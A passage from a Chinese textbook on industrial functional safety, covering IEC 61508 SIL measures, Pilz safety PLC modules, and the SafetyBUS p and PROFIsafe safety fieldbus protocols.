以减小信息线中大电流感生的串音; 必须提高抗干 扰性 , 以减小对安全相关系统的电磁干扰; 必须采用抗物理环境 (如温度 、湿度 、水 、振 动 、灰尘 、腐蚀物) 的措施 , 以防止实际环境的影响引起失效; 这些技术被 SIL1~SIL4级 所极力推荐 ,若不使用这种技术或措施 ,则应详细说明不使用的理由 。 2) 要采用抗温升措施 ,控制通风和加热中的失效 。对于 SIL1系统 ,可以使用温度传感 器检测超标温度 ;对于 SIL4系统 ,则要求通过热保险触发安全关闭这样有效性高的技术 。 3) 应在利用冗余硬件进行测试 、代码保护 、抗合成信号传输 、多种硬件等技术中至少 选择一种 ,应用于控制由环境应用或影响引起的失效 。 (4) 控制操作过程失效的技术措施 。 1) 必须采取修改保护技术 , 防止修改安全相关系统的硬件与软件 。 例如利用传感器信 号的似真性检查 、技术过程检测和自动起动测试 、 自动控制地检测修改或变换 。 当检测到 一 个修改时 ,就采取应急动作 。 2) 应在“ 利用在线监测检测失效”“ 输入确认 ”“失效断言编程 ” 等技术中至少选择 一 种 ,应用于控制系统工作失效 。 (5) 在安全要求规范中避免失误的技术措施 。 1) 必须有项目管理 。在开发和测试安全相关系统时采用一种组织模型 、一些规则和措施 。 包括: 建立一个组织模型 ,特别是质量保证的组织模型 ;定义一个设计机构 ;定义一个序列计 划 ;定义一个内部检验的标准化程序; 配置管理与采用质保措施定量评估 。对于 SIL1系统, 要求有行动和责任的定义 、进度表编制和资源分配 、相关人员培训 、修改后的一致性检查等措 施 ;但对于 SIL4系统 ,就要求与设计无关的确认 、项目监视 、标准化的确认规程 、配置管理 、 失效统计 、计算机辅助工程 、计算机辅助软件工程等措施保障 ,才能达到要求 。 2) 必须编制文档 。通过把开发过程中的每一步编写成文件从而避免失效和便于评估系 统安全性 。对于 SIL1系统 , 要求有图形和自然语言描述 , 例如方块图 、 流程图; 而对于 SIL4系统 ,就要求有与整个文档组织的内容和编排相协调的指南 、 内容检查列表 、计算机 辅助文档管理 、形式化变更控制等措施 。 3) 要求分离开安全相关系统与非安全相关系统 。对 SIL1系统 , 只要安全相关系统与非安全相关系统之间有定义完善的接口就可以接受 ,但对于 SIL4级系统 , 就要求完全将一者 分离 ,非安全相关系统不应对安全相关系统进行写访问 , 而且物理位置完全分开 , 以避免共 同原因的影响 。 4) 应在规范的检查 、半形式化的方法 、检查列表 、计算机辅助规范工具 、形式化方法 等技术中至少选择一种 ,应用于安全要求规范中避免失误 。 (6) 在设计和开发过程中避免引入故障的技术措施 。 1) 必须遵循指南和标准进行系统设计 ,采用项目管理 、编制文档等措施 ,进行结构化 、 模块化设计 。这些措施的严格程序及技术应用的深度取决于 SIL等级 , SIL级别越高 ,技术 措施的严格程序及有效性要求越高 。 2) 应在半形式化方法 、检查列表 、计算机辅助设计工具 、仿真 、硬件检查等技术中至少 选择一种 ,应用于设计和开发过程中 ,避免引入故障 。 (7) 在集成过程中避免故障的技术措施 。 1) 必须采用项目管理 、编制文档和功能测试技术 , 避免在集成阶段产生失效以及揭示 在本阶段和前面阶段产生的失效 。 这些措施的严格程序及技术应用的深度 , 取决于 SIL等 级 ,SIL级别越高 ,技术措施的严格程序及有效性要求越高 。 2) 应在黑盒测试 、现场经验 、统计测试等技术方法中至少选择一种 , 应用于在集成过 程中避免故障 。 (8) 在操作和维护规程中避免失效的技术与措施 。 1) 必须制定操作和维护说明书 ,充分考虑用户友善性 、维护友善性 , 采用项目管理并 编制文档 。这些措施的严格程序及技术应用的深度 ,取决于 SIL等级 , SIL级别越高 ,技术 措施的严格程序要求及有效性要求越高 。 2) 应在有限的操作可能性 、 防止操作员出错 、仅可由熟练操作员进行操作等要求中选 择至少一种 ,应用于在操作和维护规程中避免失效 。 (9) 在安全确认过程中避免失效的技术措施 。 1) 在进行安全确认过程中 ,必须采取功能测试 、在环境条件下测试功能技术以评估安 全相关系统是否能耐受典型的环境影响; 必须采取浪涌抗扰性测试检验安全相关系统应付峰 值浪涌的能力; 采用故障插入测试技术评估系统执行安全功能的可靠性 。 同时针对不同等级 SIL系统 ,执行不同等级的项目管理与文档编制管理要求 。 2) 应在静态分析 、动态分析和失效分析 、仿真和失效分析 、最差情况分析 、动态分析 和失效分析 、静态分析和失效分析等分析技术中选择至少一种 ,应用于在安全确认过程中避 免失效 。 3) 应在“ 扩展的功能测试”“ 黑盒测试”“ 故障插入测试”“ 静态测试”“ 最差情况测试 ” “ 现场经验 ” 等测试技术中至少选择一种 ,用于在安全确认过程中避免失效 。 5.2 电气与电子及可编程系统功能安全实现 5.2.1 安全 PLC实现 5.2.1.1 安全 PLC结构 安全 PLC采用了多套中央处理器进行控制 ,并且这些处理器来自不同的生产商 。这样的控制方式符合了冗余 、多样性控制的要求 。这是安全 PLC与普通 PLC最根本的区别 。 当 一定数量的处理器出现故障后 ,完好的处理器依然执行安全功能 ,切断所有安全输出使系统 停机 。导致系统停机的处理器的故障数量取决于不同的系统 。 如 1oo2系统 (2取 1的系 统), 一旦一个处理器出现故障 , 系统立刻进入故障安全状态 ; 又如 2oo3系统 (3取 2的 系统), 当一个处理器出现故障 , 系统并不会停机 。 系统只有在 2个处理器同时出现故障 的情况下才会导致系统停机 。 前者通常称为 2重冗余系统 , 安全可靠性较高 、 可用性较 低 ; 后者通常称为 3重冗余系统 , 其安全可靠性和可用性较高 , 但相比前者成本高 。 对 于信号的采集 、 处理和输出的过程 , 安全 PLC都采用了冗余控制的方式 。 当信号进入 PLC后 , 分别进入多个输入寄存器 , 再通过对应的多个中央处理器的处理 , 最后进入多 个输出寄存器 。 这样 , 安全 PLC就构成了多个冗余的通道 。 整个过程之中 , 信号状态 、 处理结果等可以通过安全 PLC内部的暂存装置进行相互比较 , 如果出现不一致 , 则可以 根据不同的系统特性 , 进入故障安全状态或将故障检测出来 。 安全 PLC的内部结构如图 5-4所示 。 图 5-4 安全 PLC的内部结构 输入回路可以采用双通道的方式 ,通过 2条物理接线进入安全 PLC。安全 PLC也可以 提供安全测试脉冲, 用以检测输入通道中的故障 。安全 PLC的输出内部电路也采用了冗余 、 多样性的方式 , 对一个输出节点进行安全可靠控制 。安全 PLC可以通过 2种不同的手段, 即切断基极信号和切断集电极电源两种不同的方式, 将输出信号由 1转变为 0。无论哪种方 式出现故障, 另外一种方式依然完好的执行安全功能 。 同时 , 安全 PLC提供了内部检测脉 冲 , 以检测内部故障 。安全 PLC的扫描时间要求为每千条指令1ms以下 。快速的中央处理 功能不仅可以达到紧急停车的要求 , 同时能够以较短的时间完成整套系统的安全功能自检 。 在软件方面, 安全 PLC必须有可靠的编程环境 、校验手段 , 以保证安全 。 这主要通过规范 安全功能编程来实现 。如德国 Pilz(皮尔磁) 公司的安全 PLC, 提供了通过认证的 MBS安全标准功能块 , 以帮助编程人员进行合理的 、安全的编程 。这些 MBS功能块涵盖了机械制 造领域及流程化工领域的安全功能控制 。 安全功能块经过加密 , 不能够修改 , 只需要在 功能块的输入和输出部分填入相应的地址 、参数和中间变量 , 即可以完成对安全功能的 编程 。 图 5-5 PSS BMP5/2外形 5.2.1.2 皮尔磁公司安全 PLC 德国 Pilz公司的安全 PLC具有如下模块 。 (1) PSS BMP5/2。 PSS BMP5/2外形如图 5-5所示 。 PSS BMP5/2 有 5个安全插槽 , 其中 2个可以转换为标准插槽 , 与 PSS3100系统兼容 。它模块简单 ,安装快速 。PSS3100 系列模块机架有7个可选插槽 , 包括一条安全失效总线 和一条标准总线 。安全失效模块最多有 5个插槽 , 标准 模块最多有2个插槽 。第一个插槽往往作为 PSS1PS的 电源 模 块 , 第 二 个 作 为 PSS1CPU 的 中 央 处 理 单 元 。 PSS1BMP5/2设计成 PSS3100系列机械安装和安全相 关系统内部电气布线的结合体 ,具有一个用于安装失效安全模块的冗余总线 。插槽1和插槽 2有单通道的用于安装标准模块 ,例如 PSS1IBS-SPCP、P9DI、P9DO等的模块 ,如图5-6所示 。 单元特性: .可以容纳5个安全相关模块的机架 。 .坚固的铝制外壳 。 .在19in的机架上有安装孔 。 (2) 中央处理器 PSS1SBCPU3。 PSS1SB CPU3外 形 如 图 5-7所 示 。 PSS1SB CPU3符合IEC61508标准 , 是带整体测试算法和冗 余设计的中央处理单元 , 可作为安全相关系统模块的 一部分 , 连接到安全总线 SafetyBus p上 , 配合 PSS 3100使用 ,可以控制集总模块或者是分散的外部模块 。 程序和变量数据 ,可以分为故障安全部分和标准部分 。 图 5-6 PSS BMP5/2结构示意图 1— 失效 安全总线 ; 2— 标准总线 ; 3— 接地 PSS1SBCPU3处理并且存储用户 PSS1SBCPU3提供了安全系统总线 SafetyBUS p的接口 。SafetyBUS p可以使用户建 立一个安全的可编程系统的分散网络并且/或者与分散模块相连 。 PSS可以实现一个基于 SafetyBUS p的管理功能 、逻辑功能 , 以及输入 、输出功能 。安全相关的任务由故障安全模 块执行 。故障安全模块被设计成多通道的 ,也就是说一个以上的 CPU独立地处理用户程序 。 与此同时 ,标准模块被设计成单通道的模式 , 它处理所有非安全相关的任务 。 一个四位数的显示屏和 LED指示灯提供了安全系统的状态信息并且可以及时报错 。这些模块提供以下接口: .结合 RS232接口(最低配置接地 、TxD、RxD)/RS485作为编程设备接口 。 .结合 RS232/RS485接口的用户界面 。其中 ,终端上的 RS485接口可以关掉 。 .集总外围模块(故障安全模块和标准模块) 接口 。 .另外为 PSS1SBCPU3提供连接离散外围模块 (失效安全模块) 和一些安全系统的 离散网络的 SafetyBUS p接口 。 单元特性: . SafetyBUS p连接 。 .经批准的故障模块型号 。 .强大的高速 CPU处理方式 。 .故障安全( FS) 和标准( ST) 的程序不用反馈即可处理 。 .核定的模块可用于所有的主要功能 ,如紧急停车 ,从而减少了开发和调试费用 。 .提供可编程通信接口 。 (3) 电源模块 PSS1PS24。 PSS1PS24外形如图5-8所示 。PSS1PS24是带内部保护和监控的供电模块 , 可作为 安全系统的一部分 。 图 5-8 PSS1PS24外形 PS供电模块提供了 PLC机柜可以正常工作地内部电压 、编写用户内存所需的12V直流 电压 。单位的输出电压是24V的直流电压 。一个内嵌的电池被当作标准部分所有记忆元件 的缓存区 ,这个电池被 CPU监控 。 PSS1PS24适用于 PSS3100系列的模块框架有一个3管脚的内部螺旋式连接器以连接供电电压 。PSS1PS24的供电接口如图5-9所示 。 单元特征: .通过批准的故障模块 。 .整个系统经 BG和 TÜV认证 。 .适用 PSS3100的24V直流电版本 。 .整体保护和监测电路 。 图 5-9 PSS1PS24的 供电接口示意图 (4) 输入输出模块 PSS1DI20T。 PSS1DI20T如图5-10所示 。PSS1DI20T是安全数字量输入/输出模块 , 16个输入, 不使用测试脉冲可达 Cat.2, 16个半导体单极输出 ,使用于 PSS3100系统 。 图 5-10 PSS1DI20T PSS1DI20T模块有16个 DIT结构的输入接口 ,带有一个过滤器和通过光电耦合器和 转换器电隔离实现的控制电路 。CPU接受的输入状态为“ 0 ”信号(“低”) 或“ 1 ”信号 (“高”), 并且 LED显示的状态投入,“1”亮“ 0” 暗 。诊断电路检测输入过滤器和光耦合 器 ,如果出现错误 ,PSS将被切换到 STOP状态 ,关闭输出端并且联锁 CPU显示器上的报 警提示 。 DI可以用来监测急停电路 , 比如说它们一般适合以下接口 。 1) 单通道的安全相关输入设备: ①带有测试脉冲; ②不带有测试脉冲 。 2) 多通道的安全相关输入设备: ①带有测试脉冲; ②不带有测试脉冲 。 图 5-11 PSS1DI20T引脚图 PSS1DI20T有 16个 DO T结构的输出接口 。 当它们 8 个组成一组后 ,可以作为脉冲测试输出或者单极输出 (电流 为 2A)。 PSS1DI20T引脚如图5-11所示 。DO适合以下接 口: 1) 最大允许电流为2A的电阻性负载 。 2) 最大允许电流为2A的电感性负载 。 3) 输出端口可以组合成8个一组以产生测试脉冲 。 当与故障安全输入端口相连接时 , 外部的电路系统中的 短路和电源可以被监控 。 单元特征: .经批准的故障模块型号 。 .整个系统经 BG批准 。 .按照IEC61508SIL3设计的故障安全 。 .16个数字输入 。 .16个数字输出(2A) 或脉冲输出 。 .电隔离的高噪声抑制 。 .整体保护电路 。 (5) 安全系统总线模块 。 SafetyBUS p是个开放的安全现场总线系统 。来自不同 的元器件生产厂家的产品可以连入 SafetyBUS p安全现场总 线系统 。 5.2.2 安全现场总线 5.2.2.1 通用现场总线 (1) 现场总线的概念 。 现场总线是用在现场的总线技术 。 传统控制系统的接 线方式是一种并联接线方式 , 由 PLC控制各个电器元件 , 对应每一个元件有一个 I/O 口 , 两者之间需要用两个线进 行连接 , 作为控制和/或电源 。 当 PLC所控制的电器元件数量达到数十个甚至数百个时 , 整个系统的接线就显得十分复杂 , 容易搞错 , 施工和维护都十分不便 。 为此 , 人们考虑 怎么样把那么多的导线合并到一起 , 用一根导线来连接所有设备 , 所有的数据和信号都 在这个线上流通 , 同时设备之间的控制和通信可任意设置 。 因而这根线自然地被称为总线 , 就如计算机内部地总线概念一样 。 由于控制 对 象 都 在 工 矿 现 场 , 不 同 于 计算机通 常 用 于 室 内 , 所 以 这 种 总 线 被称为 现 场 地 总 线 , 简 称 现 场 总 线 。 传统接线方式和现场 总 线 的 区 别 如 图 5-12所示 。 (2) 现场总线的特点 。 现场总线技术实际上是采用串行数 据传输和连接方式代替传统的并联信号 传输和连接方式的方法 , 它依次实现了控制层和现场总线设备层之间的数据传输, 同时在保证传输实时性的情况下实现信息的可靠 性和开放性 。一般的现场总线具有以下几个特点: 1) 布线简单 。 这是大多现场总线共有的特性 , 现场总线的最大革命是布线方式的 革命 , 最小化的布线方式和最大化的网络拓扑使得系统的接线成本和维护成本大大降 低 。 由于采用串行方式 , 所以大多数现场总线采用双绞线 , 还有直接在 两 根 信 号 线 上 加载电源的总线形式 。 这样 , 采用现场总线类型的设备和系统给人明显的感觉 就 是 简 单直观 。 2) 开放性 。一个总线必须具有开放性 , 这指两个方面: 一方面能与不同的控制系统相 连接 ,也就是应用的开放性; 另一方面就是通信规约的开放 ,也就是开发的开放性 。 只有具 备了开放性, 才能使得现场总线既具备传统总线的低成本特点 , 又能适合先进控制的网络化 和系统化要求 。 3) 实时性 。 总线的实时性要求是为了适应现场控制和现场采集的特点 。 一般的现场总 线都要求在保证数据可靠性和完整性的条件下具备较高的传输率和传输效率 。 总线的传输速 度要求越快越好 ,速度越快, 表示系统的响应时间就越短, 但是传输速度不能仅靠提高传输 速率来解决, 传输的效率也很重要 。传输效率主要是有效用户数据在传输帧中的比率还有成 功传输帧在所有传输帧的比率 。 4) 可靠性 。一般总线都具备一定的抗干扰能力 , 同时 , 当系统发生故障是 , 具备一定 的诊断能力 , 以最大限度的保护网络 , 同时较快的查找和更换故障节点 。 总线故障诊断能力 的大小是由总线所采用的传输的物理媒介和传输的软件协议决定的 ,所以不同的总线具有不 同的诊断能力和处理能力 。 5.2.2.2 安全现场总线结构 如果将安全设备连接到非安全的现场总线系统 (如标准的 Profibus、 DeviceNet等总线 系统) 上去 ,就会存在比较大的安全隐患 ,可能存在非安全的控制状态 。 (1) 现场总线的安全需求 。 1) 现场总线的生存性 。现场总线的生存性给出了现场总线在随机性破坏作用下的可靠 性 ,这里的随机性破坏是指组成现场总线的节点和链路自然失效 。生存性实际上是指现场总 线的连通性, 使得在任何时刻都可以传送安全信息 , 因此它是实现现场总线故障安全传输的 基本保证 。 2) 安全信息传输的完整性 。现场总线安全信息传输的完整性 , 是指现场总线在自身存在故障或外界干扰的条件下 , 总能以极高的概率将安全信息从源端正确的传输到宿端 , 这是 实现现场总线故障安全传输的第二个保证 。 3) 安全信息传输的实时性 。现场总线安全信息传输的实时性是指现场总线在自身存在 故障或外界干扰的条件下 ,应以极高的概率保证在一个可预知的有限时间内完成安全信息的 正确传输 。为了保证整个现场总线的实时性 ,还必须满足下列三个时间约束: .应当限定每个节点每次取得通信权的时间上限值 。若超过此值 ,无论本次通信任务是 否完成 ,均应立即释放通信权 。这一时间约束条件可以防止某一节点长期占有现场总线而导 致其他节点的实时性恶化 。 .应当保证在某一固定的时间周期内 ,现场总线的每一个节点都有机会取得通信权 , 以 防止个别节点因长时间得不到通信权而使其实时性太差甚至丧失通信能力 。 .对于紧急任务 , 当其实时性要求临时变得很高时 , 应当给予优先服务 。对于实时性 要求比较高的节点 , 也应当使它取得通信权的机会比其他节点多一些 。 如果能采用静态 (固定) 的方式赋予某些节点较高的优先权 , 则将使紧急任务及重点节点的实时性得到 满足 。 4) 安全性信息传输的可测性 。 现场总线故障安全传输的实质就是实现安全信息的 完整性和实时性传输 , 而且现场总线传输的可测性就是指它能以极高的概率在一个预 知的有限时间内检测到崩溃 、 遗漏 、 瑕疵和超时等失效 , 并能在预知的 有 限 时 间 内 进 行校正 。 如果不能校正 , 通信控制器能以最小的执行时间以最高的概率成功的 向 主 机 报告失效 。 安全总线系统和标准总线系统的主要区别在于通信协议的标准不同 。安全总线系统的安 全是对标准协议的扩展 ,使得标准及安全装置可在同一个网络上运行 。其独特之处就在于安 全通信的实现无需诸如网关 、 网桥等昂贵的硬件设备 ,仅仅通过软件层就可实现 。安全总线的协议结构如图5-13所示 。 图 5-13 安全总线的协议结构示意图 安全现场总线系统的优点: 1) 有 性 能 卓 越 的 传 输 介 质 , 已 经 过 “ 高噪声干扰” 等恶劣场合的考验 。 2) 重合“ 节点地址” 的自动检查功能 。 3) 内置的“ 数据链路层” 的重审功能 。 4) 通过配置建立的“ 优先权” 功能 。 5) 非常低的误码率 ( ≤10—7 , 相当于 在满负载运行情况下 , 150年只允许出现 1 次错误)。 安全控制 系 统 总 线 设 计 图 如 图 5-14 所示 。 5.2.2.3 安全总线 SafetyBUS p 德国 Pilz公司的安全系统总线 SafetyBUSp可作为安全仪表系统的安全总线 。 图5-15 是 SafetyBUS p的 拓 扑 图 。 图 中 安 全 仪 表 系 统 相 关 的 逻 辑 元 件 以 及 监 控 设 备 出 自 Pilz 公司 。 左侧灰色部分是由 Profibus DP总线系统连接的带监控设备的一般控制系统 。 图 5-14 安全控制系统总线设计图 图 5-15 SafetyBUS p的拓扑图 中间的安全 PLC是用于驱动不符合安全总线 SafetyBUS p所采用的通信协议的设备的 逻辑控制器 。 SafetyBUS p安全现场总线基于 CAN总线技术, 在弥补了 CAN总线缺点的同时还保留 了 CAN总线的优点: 1) 突出的差错检验机理, 如5种错误检测 、 出错标定和故障界定 。 2) CAN传输信号为短帧结构, 因而传输时间短 ,受干扰概率低 。这些保证了出错率极 低, 剩余错误概率为报文出错率的 4.7×10—11 。 另外 , CAN节点在严重错误的情况下 , 具 有自动关闭输出的功能 , 以使总线上其他节点的操作不受其影响 。 可见 , CAN具有高可靠 性 。SafetyBUS p总线系统中的通信媒介是单通道 。同时 ,SafetyBUS p总线中采用了一些措施来保证通信的安全可靠 。 1)冗余 、多样的硬件作为总线节点 。 在 SafetyBUS p中的安全相关的主站和从 站都 是 采 用 了 冗 余 、 多 样 的 构 架 。 如 图 5-16所示 。所有的安全相关I/O 设备的头 模块内部也采用了冗余处理芯片执行通信 功能 。 2) 安全部分与非安全部分的隔离 。如 图5-17所示 ,安全部分与非安全相关部分 的控制是完全分离的 , PSS可编程安全控 制器 、远程 I/O与 SafetyBUS p构成了 一 套独立于 SPS非安全相关控制系统的安全系统 。这套安全控制系统负责所有安全相关部分 功能的控制 , 同时与非安全相关控制系统进行数据交换 。 隔离的非安全相关控制和安全相关 控制系统如图5-17所示 。 图 5-17 隔离的非安全相关控制和安全相关控制系统 3) 对于远程I/O设备提供特殊芯片结构 。远程I/O设备的芯片架构如图 5-18所示 。 这个芯片称为 PSSSB CHIPSET, 用于 SafetyBUS p总线系统中安全相关系统的应用实施 。 图 5-18 远程I/O设备的芯片架构 它执行总线接口部分的数据通信 , 并且在总线和 节点间组织数据交换 。 通过 ChipA和 ChipB两种 相异的芯片 , 与应用层连接的 MFP( Multifunc- tional Port) 的冗余 , 除了实现Satety-BUSp总线和 应用层之间的信息交换 ,还能够响应所实施的安全 检测 。如果一个传输错误被检查出来 , 芯片组将 会出发所配置的I/O组群 ,联锁相关的安全功能 。 4) 通信协议中的措施 。 包括 CRC冗余循环 校验 、 Echo模 式 、 连 接 检 测 、 地 址 检 测 、 时 间 检测 。 5.2.2.4 安全总线 PROFIsafe (1) PROFIsafe安全通信技术 。 1) PROFIsafe的产生 。长期以来 ,安全通信技术方面的任务只能在第二层采用常规手 段或者通过专用总线分散地加以解决 ,这使得应用于制造业和过程工业自动化的分布式现场 总线 PROFIBUS的生存空间受到限制 。 1998年德国 PROFIBUS用户组织 (PNO) 以故障 安全技术的应用为目标 ,专门设立了一个工作组 , 着手制订一种整体的 、开放的解决方案 。 其通信基础是 PROFIBUS-DP,所依据的主要标准则是IEC61508、欧洲标准 EN954和 EN 50159- -1/ 2等 。 1999年 ,PNO在德国汉诺威博览会上公布了在标准 PROFIBUS上实现主 、从站之间 安全通信的技术规范 ,其注册商标名为 PROFIsafe(V1.0)。 它通过了德国 BIA(联邦劳动 安全研究所) 和 TÜV技术监督联合会的认证 。之后 ,该规范的使用范围扩大 , 成为连接任 何安全控制器所 必 备 的 先 决 条 件 。 随 着 从 站 与 从 站 之 间 安 全 通 信 (F-Slave toF-slave, PROFIBUSDPV2) 和以太网通信(PROFInet)的出台 ,PROFIsafe的工作进入了第二阶段 , 即“ V1.20,2002”。 以西门子为首的德国 25家知名企业参与了 PROFIsafe应用行规 的制订和产品开发 。 PROFIsafe的问世曾在国际现场总线技术领域中引起了轰动 。 迄今为止 , PROFIBUS 因其拥有 PROFIsafe安全技术解决方案始终是唯一能够满足制造业 (采用 RS485和光纤传 输技术) 和过程工业自动化安全通信要求的现场总线 。 2) PROFIsafe的主要特征 。PROFIsafe的主要特征归纳如下: .安全通信和标准通信在同一根电缆上共存 。 . PROFIsafe安全性建立在单信道通信系统之上 , 安全通信不通过冗余电缆来达到 目的 。 .标准通信部件 ,如电缆 、专用芯片(ASKS)、 DP 一栈软件等 ,无任何变化 (与标准 PROFIBUS相比)。 .安全措施封闭在终端模块中(F-Master, F-Slave)。 .采用专利 SIL监视器获得极高的安全性 。 .最高安全完整性等级为 SIL3(IEC61508), 相应的德国标准和欧洲标准分别为 AK6 (DIV19250), Cat.4(EN954-1), SIL3>10—8 ~10—7 , 即在连续工况下每小时故障率 。 . PROFIsafe的软件解决方案可以灵活地应用于 SIL1/2或3的设备及安全控制回路 。 .既可用于低能耗的过程自动化 , 又可用于反应迅速的制造业自动化 ,环境条件与标准 PROFIBUS相同(抗电磁干扰等)。 在众多现场总线标准中 ,PROFIBUS提供了一个从现场传感器直至生产管理层的全方 位透明的网络 ,并凭借其严格的定义 、完善的功能及标准而通用的技术 ,成为开放式系统的 典范 。 目前 ,PROFIBUS已经在许多方面 , 如生产自动化 、过程自动化 、驱动技术和楼宇 自动化等领域得到了成功的应用 ,证明了其强大 、灵活的功能 ,并已在众多的现场总线技术 中占据了首要地位 。 同时 ,PROFIBUS基于 RS-485的传输技术及相对简单的协议 、低廉的 成本也符合我国目前的国情 ,适合在我国当前情况下开发并大规模投入使用 。更重要的是, PROFIBUS因其拥有通过认证的 PROFIsafe安全技术解决方案 , 是能够按照IEC61508标 准满足制造业和工业自动化故障安全要求达到 SIL3级的安全系统 , PROFIsafe的应用可以做到对人 、机器和环境的有效保护 。 (2) PROFIsafe通信原理分析 。 1) PROFIsafe系统组态 。 图 5-19所示为典型的系统组态 。PROFIsafe使标准现场总 线技术和故障安全技术合为一个系统 , 即故障安全通信和标准通信在同一根电缆上共存 。这 不仅在布线和品种多样性方面可以节约一大笔资金 , 而且日后可以改建 。 由图 5-19可见, 系统经容错- 网关(F-Gateway) 可连接其他安全总线系统 。用户可以根据组织方面的理由将 安全功能和标准功能分配到两根 PROFIBUS干线上 ,如图5-20所示 。 图 5-19 典型的系统组态 图 5-20 安全功能和标准功能分配 过程工业自动化要求采用冗余来提高设备的使用率, PROFIsafe则采用单信道通信结构 的方法可以非常容易的实现上述要求 , 单信道故障安全可编程控制器可以达到 SIL3。 这种通信结构原则上也可以执行标准自动化任务 ,如诊断 、参数设置服务器等 。 2) PROFIsafe层结构 。PROFIsafe解决方案的ISO/OSI简化模型如图5-21所示 。 图 5-21 PROFIsafe解决方案的ISO/OSI简化模型 众所周知 ,Profibus在ISO/OSI模型中仅使用了第 1层(物理层)、 第 2层 (数据链路 层) 和第7层(应用层)。 故障安全措施则置于第 7层之上的安全层 (Safety Layer)。 由于 该层仅对有效数据的安全传送负责 , 它需要上层负责准备与提供有效数据 , 而在一个安全现 场设备(例如安全输入) 中是由它的技术固件来施行的 。这类固件通常至少有一部分是按照 故障安全技术要求设计的 。 在冗余的硬 、软件结构中嵌入 PROFIsafe功能也可以达到上述 目的 。 同标准操作一样 ,过程信号及过程数据出现在相应的有效报文中 ,在安全操作时 , 仅对这些报文加以补充 。 3) 黑色通道 原 理 。 PROFIsafe 以电 缆 、 芯 片 、 基 本 软 件 包 (层 栈)、 Profibus-DP 主 站 和 Profibus- DP从站等标准总线通信部件为基 础 ,这些均被划入黑色通道(Black Channel), 如图5-22所示 。它一方 面表示在黑色通道中可能出现的所 有故障均由 PROFisafe查出 ;另一方 面黑色通道中没有提高传输安全性 的各项功能 ,所以它不涉及安全技 术的范畴 。 图5-23所示为 PROFIsafe运 用黑色通道原理以适应错综复杂的 Profibus结构的例子 。 图 5-22 黑色通道原理 图 5-23 PROFIsafe适应复杂 Profibus结构 源于某个模块式从站( 一个 Profibus站点 , 它可内装若干个带输入/输出通道的故障安 全模块) 的发送器信号经 Profibus从站联结点进入故障安全控制器的两个 DP主站联结点中 的一个 ,从那里经局域总线进入 F— 控制器 , 即故障安全 CPU。 经联结后产生的一个输出 信号再次通过局域总线进入第二个 DP主站联结点 , 进入第二根 Profibus干线 。 传输速度 在 DP-PA链接器中降低 , 使用 PA物理传输技术 ( MBP-IS) 达到 31.25kBaud, 将信号输 送到故障安全 PA从站中 。 此信号在其通信路径的任何地点均未使用一条冗余通道 , 也就 是说 , 传输是单通道的 。 这里运用了 Profibus的标准机制 , 即主 — 从操作方式 。 一个主站 通常为一个 CPU, 循环地与其所有组态的从站交换报文 , 即在主站与从站之间存在着1∶1 的关系 。这种轮询操作(Polling) 方式的优点是一旦某个设备出现故障能够立即察觉 ,这正 是故障安全技术的基本原则之一 。 (3) PROFIsafe保护措施分析 。 1) PROFIsafe保护措施描述 。在复杂的网络拓扑结构中 , 发送报文会引发一系列的错 误 ,如报文丢失 、重复 、添加 、顺序错 、延迟及伪数据等 。在故障安全通信中还会出现寻址 错 , 即一个标准报文错误地出现在 一 个 故 障 安 全 站 点 中 , 且 被 当 作 故 障 安 全 报 文 输 出 (Masquerade——— 化装/伪装)。 此外 ,传输速率的不同还可能对存储器产生不良后果 。 PROFIsafe应对传输错误的措施见表5-8。 .故障安全报文按顺序编号 。一台接收器根据顺序号可以判断它是否收到按正确顺序排 列的全部报文 。如果它将有顺序号的“ 空 ”报文作为应答送返发送器 ,则该接收器同样是可 信的 。从原理上讲 , 只要在其中设置一个“ Toggle Bit” 也就足够了 ,但 PROFIsafe因其采 用总线存储元件(路由器) 而选择了一个0 ~255的计数器 ,其中“ 0”为例外 。 表 5-8 PROFIsafe应对传输错误的措施 测 量 故 障 连贯数字 应答时间期 发送与接收方代码名 数据保护 重复 × 丢失 × × 插入 × × × 不正确序列 × 错误数据 × 延时 × 安 全 和 标 准 消 息 的 相 互 连 接 (包括错误和二次寻址) × × × .带应答的时间监控 。在故障安全技术中 ,一个报文仅仅传输正确的过程信号或数值是 不够的 ,重要的是这些数值必须在故障极限时间内送达 ,才能使现场相关站点自动地作出安 全响应 。为此 ,各站点均配备一个时间控制器 , 它在故障安全报文到达后即刻“ 复原”。 .用密码标识发送器和接收器 。 主站与从站之间 1∶1的关系易于辨别错误报文 。两者 均设有网络明确规定的标志(密码), 以此即可核查某报文的真实性 。 .增设16/32位循环冗余校验 (CRC)。 为保证数据的安全增设循环冗余校验 (CRC, Cyclic Redundancy Check), 对报文错误数据位的识别具有重要作用 。CRC安全措施不仅循 环地保证过程信号和数据的完整性 , 而且也保证在相关从站中存放的参数 ,如标志(密码)、 看门狗( WatchDog) 时间等完整性 。 2) 故障概率分析 。根据IEC61508, PROFIsafe以一个或若干个故障安全功能的控制 回路为出发点考虑故障概率 。 由图5-24可见 ,一个故障安全控制回路包括参与某个安全控 制功能的全部传感器 、执行器 、传输元件和逻辑处理单元 。IEC61508针对不同的 SIL规定 了故障总概率 。例如 ,SIL3∶10—7/h ,PROFIsafe在传输过程中仅占其 1% , 即容许的故障 概率为10—9/h 。根据IEC61508和 EN50159-1,对于 SIL3,故障概率可应用下式计算 RDP =RHW +REMI +RTC <10— 7/h (5 - 1) 式中: RHW 为硬件失效 ;REMI为 EMI失效 ;RTC 为传输代码失效 。 图 5-24 安全控制回路与故障概率 由此可以建立与报文长度相关的 CRC多项式 , 以保证未经发现的错误报文残留错误率 (Residua Error Rate) 达到所要求的数量级 。 在 PROFIsafe中 不 使 用 Profibus所 依 靠 的 帧 校 验 序 列 (FCS, Frame Checking Se- quence) 和奇偶校验(Parity Check) 来识别基本错误 。换句话说 ,基本机制下的故障揭示概率不受附加的 PROFIsafe CRC机制的影响 。 当位错误率很高时 , 即当一个报文有许多位受到干扰时 ,残留错误率难以确定 。为避免 任何不安全性 ,PROFIsafe使用了一种称之为 SIL监视器的方法 , 这种方法已经获得专利 权 。表5-9和表5-10为 SIL等级划分 。 表 5-9 SIL等级(摘自 EN50129) 完成安全仪表功能危险 失效的目标频率(每小时) 安全完整性等级 (SIL) 完成安全仪表功能危险 失效的目标频率(每小时) 安全完整性等级 (SIL) 10—9≤THR<10—8 4 10—7≤THR<10—6 2 10—8≤THR<10—7 3 10—6≤THR<10—5 1 注 THR为“ 在连续工况下每小时的故障率”。 表 5-10 SIL等级(摘自IEC61508) 安全完整性等级 连续操作期间每年的最小概率 说 明 SIL4 10—5~10—4 